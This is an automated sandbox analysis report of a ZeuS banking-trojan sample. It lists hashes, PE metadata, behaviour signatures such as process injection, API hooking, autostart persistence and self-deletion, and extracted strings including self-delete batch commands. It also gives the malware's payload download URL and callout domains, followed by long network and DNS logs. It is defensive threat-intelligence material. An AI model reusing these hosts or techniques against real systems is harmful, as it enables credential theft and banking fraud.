ANALYSIS OVERVIEWNETWORK DATAHOOKSCOLLAPSE ALL

Joebox - Abstract Analysis File 10064
+ General information
Joebox version: 4.5.0
Start time: 15:11:40
Start date: 01/12/2011
Overall analysis duration: 0h 8m 49s
Target binary file name: ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe
Target script file name: default.jbs
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 3
Errors:
  • Too many NtWriteVirtualMemory calls (excessive behavior)
  • Too many NtProtectVirtualMemory calls (excessive behavior)
  • Too many NtSetInformationFile calls (excessive behavior)
  • Too many NtReadVirtualMemory calls (excessive behavior)
+ Classification / Thread Score
Persistence, Installation Boot Survival:
Hidding, Stealthness, Detection and Removal Protection:
Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection:
Spreading:
Exploiting:
Networking:
Data spying, Sniffing, Keylogging, Ebanking Fraud:
+ Signature Detections
  • Creates files inside the user directory
  • Creates temporary files
  • Executes batch files
  • Printf formatting strings found in memory and binary data
  • Queries a list of all running processes
  • Spawns processes
  • Urls found in memory or binary data
  • Binary may include packed or crypted data
  • Creates an autostart registry key
  • Deletes itself after installation
  • Downloads files from webservers via HTTP
  • Entrypoint lies outside standard sections
  • Found strings which match to known social media urls
  • PE file contains sections with non-standard names
  • Performs DNS lookups
  • Posts data to webserver
  • Allocates memory in foreign processes
  • Creates a thread in another existing process (thread injection)
  • Disables the phising filter of internet explorer 8
  • Found strings which match to known bank urls
  • Hooks clipboard functions (used to sniff clipboard data)
  • Hooks files or directories query functions (used to hide files and directories)
  • Hooks winsocket function (used for sniffing or altering network traffic)
  • Infects existing html files
  • Injects a PE file into a foreign processes
  • Modifies the prolog of usermode functions (usermode inline hooks)
  • Writes to foreign memory regions
Static File Information
+ General Information
File name: ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe
File size: 171520
MD5: fb65104ccd2ca664496234d3f2c2a371
SHA1: c647ffda8cf6bf08936f8b5fe51fba8f5cc76c00
SHA256: e6b30ad8647860a5711d96e34478a715b89dc9c9a3d1e24608dbf4affcb001a5
File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+ PE Information
+ General
Entrypoint: 0x441570L UPX1
Imagebase: 0x400000L
Time stamp: 0x4ED69E59 [Wed Nov 30 21:21:29 2011 UTC]
Subsystem: windows gui
TLS callbacks:
+ Resources
Name RVA address Size Type
Russian 0x42194L 0x10a8L data
Russian 0x43240L 0x8a8L data
Russian 0x43aecL 0x14L MS Windows icon resource - 1 icon
Russian 0x43b04L 0x14L MS Windows icon resource - 1 icon
Russian 0x43b1cL 0x35cL data
English 0x43e7cL 0x15aL ASCII text, with CRLF line terminators
+ Imports
DLL Import
KERNEL32.DLL LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
GDI32.dll SetMapMode
ole32.dll CoInitialize
OLEAUT32.dll
USER32.dll GetDC
+ Exports
+ Sections
Name Virtual address Virtual size Raw size entropy
UPX0 0x1000L 0x19000L 0x0L 0.0
UPX1 0x1a000L 0x28000L 0x27800L 7.941156889
.rsrc 0x42000L 0x3000L 0x2200L 5.84145342324
+ Version Infos
Description Data
FileVersion 7.2.1.5
InternalName WinCG
ProductVersion 7.2.1.5
LegalCopyright Copyright (C) 2010 Andre Schulz
FileDescription Windows CryptContext Generator (WinCG)
CompanyName This is Free Software under the terms of the GNU GPL v2
ProductName CryptContext Generator
OriginalFilename WinCG
Translation 0x0409 0x04b0
+ Possible Origin
Language of compilation system Country where language is spoken Map
Russian Russia
English United States
String Analysis
+ Formattings for printf style functions
String value Source
%SystemRoot%\System32\mswsock.dll cmd.exe
del /F "%s" ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
o/]{:v%s1qgxd6 hianh.exe.dr
%02d%s%02d%s%02d cmd.exe
|%SystemRoot%\system32\rsvpsp.dll hianh.exe, ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%2d%s%02d%s%02d%s%02d cmd.exe
CMD Internal Error %s cmd.exe
%C1[r0 hianh.exe.dr
%02d%s%02d%s cmd.exe
del "%s" ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
`tA%C]o hianh.exe.dr
"%s" %s ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%USERPROFILE%\Appl hianh.exe
/c "%s" ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
V@2%Pp` profi[1].bin.dr
%s%08x.%s ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%s %s cmd.exe
%f0,@]FN,: hianh.exe.dr
?8%O@) profi[1].bin.dr
if exist "%s" goto d ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
(%s) %s cmd.exe
%s%08x ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
ache%OLK* cmd.exe
%SystemRoot%\system32\rsvpsp.dll hianh.exe, ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%s %s%s cmd.exe
%SystemRoot%\System32\winrnr.dll hianh.exe, ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe, cmd.exe
%SystemRoot%\system32\mswsock.dll cmd.exe
+ URLs
String value Source
http://baygleefacfif.nightmail.ru/profi.bin explorer.exe
http://digitalid.verisign.com explorer.exe
http://sexsecret.com/store/includes/ext/red.php explorer.exe
http://www.google.com/ig%3fhl%3den%26source%3diglk&usg=afqjcnfa18xpfgb7dknxfkz7x7g1gdh1tg webhp[1].txt.dr
http://www.google.com/logos/2011/thanksgiving.html# webhp[1].txt.dr
http://www.google.com/webhp explorer.exe, ctfmon.exe, wscntfy.exe
http://www.google.com/webhp%3fcplp%3d webhp[1].txt.dr
http://www.google.cz/ webhp[1].txt.dr
http://www.infobeat.com explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=3doutlookexpress&pve= explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=cert explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=home explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=hotmail explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=infobeat explorer.exe
http://www.microsoft.com/isapi/redir.dll?prd=outlookexpress&pver=6.0&clcid=0x0409&ar=verisign explorer.exe
https://accounts.google.com/servicelogin?continue webhp[1].txt.dr
https://plus.google.com/116899029375914044550 webhp[1].txt.dr
https://plusone.google.com/u/0 webhp[1].txt.dr
https://ssl.gstatic.com/gb/js/abc/gcm_e9b1c8ddbdbba9ea5c035548a0320af1.js webhp[1].txt.dr
https://ssl.gstatic.com/gb/js/abc/pwm_4e7edac1f189ab82bc4091ff7bfe6f4b.js webhp[1].txt.dr
+ Social media names
String value Source
/Hotmail.gif equals www.hotmail.com (Hotmail) explorer.exe
<img src="res://msoeres.dll/Hotmail.gif"><br> equals www.hotmail.com (Hotmail) explorer.exe
<img src=3D"res://msoeres.dll/Hotmail.gif"><br> equals www.hotmail.com (Hotmail) explorer.exe
Get a free Hotmail account! equals www.hotmail.com (Hotmail) explorer.exe
Get a free Hotmail account!</a> Then read your mail from any place on = equals www.hotmail.com (Hotmail) explorer.exe
Get a free Hotmail account!</a> Then read your mail from any place on earth. equals www.hotmail.com (Hotmail) explorer.exe
Ses://msoeres.dll/Hotmail.gif equals www.hotmail.com (Hotmail) explorer.exe
res://msoeres.dll/Hotmail.gif equals www.hotmail.com (Hotmail) explorer.exe
+ Bank names
String value Source
WINTRUST.dll equals www.wintrust.com (Wintrust Financial Corporation) explorer.exe
Analysis Overview
+ Startup
  • system is xp
  • cleanup
+ Dropped Files
File Path MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat 5DFCFFC250A5C85ADFE0FB447849B784
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat C02B0BD696B8B40794F2F04646760B1C
C:\Documents and Settings\Administrator\Application Data\887021879.log 22F9E2D5502451ACE279D693DE6EF609
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 0FA8C6FF6A0816FF75416A307F79FC7A
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei C67AD2CC1A4C840B94811B24D1F6DA25
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\profi[1].bin 63388EB2E8D078EEFD47945E4B3C7AA0
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm 7A285EC8EF4E3C212344DADC6A7ACF4B
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt E656B36A17F6B1FE13E003111D518BE8
+ Involved Domains
Name IP Name Server ASN ASN Description ANS State Registrar e-Mail
sexsecret.com 184.168.213.44 ns25.domaincontrol.com ns26.domaincontrol.com AS26496 PAH-INC - GoDaddy.com, Inc. US GODADDY.COM, INC. sales@alexander-institute.com
www.google.com 74.125.39.99 AS15169 GOOGLE - Google Inc. US unknown unknown
baygleefacfif.nightmail.ru 194.186.88.59 AS3216 SOVAM-AS OJSC _Vimpelcom_ RU unknown unknown
+ Involved IP Addresses
IP ASN ASN Description ANS State
195.186.1.121 AS44038 BLUEWIN-AS Swisscom (Schweiz) AG CH
Global Network Data
+ All TCP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 1, 2011 15:18:18.185386896 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.185460091 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.185791969 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.188780069 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.188810110 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.532304049 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.597053051 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.597300053 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.597332954 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.616430998 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.616625071 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.616648912 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.623820066 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.624083042 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.624104977 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.624844074 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.643755913 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.662195921 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.662462950 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.662492037 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.662504911 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.662684917 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.662699938 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.676281929 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.676573038 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.676597118 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.676601887 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.702502012 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.702723980 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.702749014 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.724565029 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.724845886 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.724874020 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.725063086 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.725862980 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.728842974 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.729105949 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.729124069 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.753705978 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.754018068 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.754077911 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.754534960 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.754776955 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.781233072 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.781281948 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.781650066 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.781743050 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.800118923 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.800126076 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.800529003 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.800621986 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.853334904 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.853657007 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.853780985 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.853847980 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.854109049 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.854214907 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.871515036 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.873306990 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.873703957 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.873761892 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.874011993 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.879692078 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.879698992 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.880093098 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.917557001 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.922044992 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.922441006 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.922494888 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.922535896 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.923877001 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.924262047 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.924279928 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.924666882 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.946041107 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.960292101 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.960685968 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.960747004 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.960782051 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.967232943 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.967962027 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.967999935 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.985457897 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:18.985894918 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:18.985954046 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.050123930 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.050568104 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.050632954 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.050648928 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.050909996 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.058980942 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.058988094 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.059389114 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.062752008 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.062758923 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.063211918 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.066415071 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.070019007 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.070401907 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.070442915 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.070786953 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.076375961 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.090068102 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.090459108 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.090511084 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.090851068 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.092531919 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.092540979 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.092946053 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.104554892 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.104794979 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.104844093 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.104851007 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.104991913 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.107372046 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.107378960 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.107578993 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.130284071 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.142271042 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.142508030 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.142566919 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.142744064 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.143069029 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.170778990 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.170950890 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.170974970 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.179817915 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.179986954 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.180010080 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.209239006 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:19.209760904 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.211258888 CET 1079 80 192.168.0.10 194.186.88.59
Dec 1, 2011 15:18:19.211275101 CET 80 1079 194.186.88.59 192.168.0.10
Dec 1, 2011 15:18:47.665731907 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:47.665787935 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.666131020 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:47.668677092 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:47.668699026 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.939644098 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.998624086 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.998997927 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:47.999017954 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.999022961 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:47.999383926 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.079001904 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.079427004 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.079441071 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.079694033 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.103765965 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.103780031 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.104218006 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.104348898 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.104361057 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.118968964 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.119349957 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.119362116 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.119643927 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.130254984 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.130264997 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.130661011 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.130774975 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.130784035 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.142738104 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.143119097 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.143131018 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.143229008 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.156383038 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.156769037 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.156788111 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.157043934 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.157329082 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.157337904 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.157712936 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.160973072 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.161344051 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.161360979 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.161612034 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.163208008 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.169120073 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.169497967 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.169511080 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.169763088 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.175570965 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.183777094 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.184149027 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.184165001 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.184422016 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.187108994 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.187117100 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.187326908 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.187526941 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.187832117 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.187840939 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.188153982 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.203917027 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.213342905 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.213673115 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.214199066 CET 1080 80 192.168.0.10 74.125.39.99
Dec 1, 2011 15:18:48.214211941 CET 80 1080 74.125.39.99 192.168.0.10
Dec 1, 2011 15:18:48.434768915 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:48.434792042 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:48.435053110 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:48.438009024 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:48.438020945 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:49.280440092 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:49.451913118 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:49.451929092 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:49.514885902 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:49.514899015 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:50.054022074 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:50.216964960 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:18:50.216979980 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:18:50.436232090 CET 1081 80 192.168.0.10 184.168.213.44
Dec 1, 2011 15:19:05.079654932 CET 80 1081 184.168.213.44 192.168.0.10
Dec 1, 2011 15:19:05.080070972 CET 1081 80 192.168.0.10 184.168.213.44
+ All UDP
Timestamp Source Port Dest Port Source IP Dest IP
Dec 1, 2011 15:18:17.575004101 CET 59202 53 192.168.0.10 195.186.1.121
Dec 1, 2011 15:18:17.929677010 CET 53 59202 195.186.1.121 192.168.0.10
Dec 1, 2011 15:18:47.494621038 CET 56090 53 192.168.0.10 195.186.1.121
Dec 1, 2011 15:18:47.639733076 CET 53 56090 195.186.1.121 192.168.0.10
Dec 1, 2011 15:18:48.225858927 CET 53530 53 192.168.0.10 195.186.1.121
Dec 1, 2011 15:18:48.430505037 CET 53 53530 195.186.1.121 192.168.0.10
+ DNS Query
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
Dec 1, 2011 15:18:17.575004101 CET 192.168.0.10 195.186.1.121 0x17ee Standard query (0) baygleefacfif.nightmail.ru A (IP address) IN (0x0001)
Dec 1, 2011 15:18:47.494621038 CET 192.168.0.10 195.186.1.121 0x78d9 Standard query (0) www.google.com A (IP address) IN (0x0001)
Dec 1, 2011 15:18:48.225858927 CET 192.168.0.10 195.186.1.121 0xa7b7 Standard query (0) sexsecret.com A (IP address) IN (0x0001)
+ DNS Answer
Timestamp Source IP Dest IP Trans ID Replay Code Name CName Address Type Class
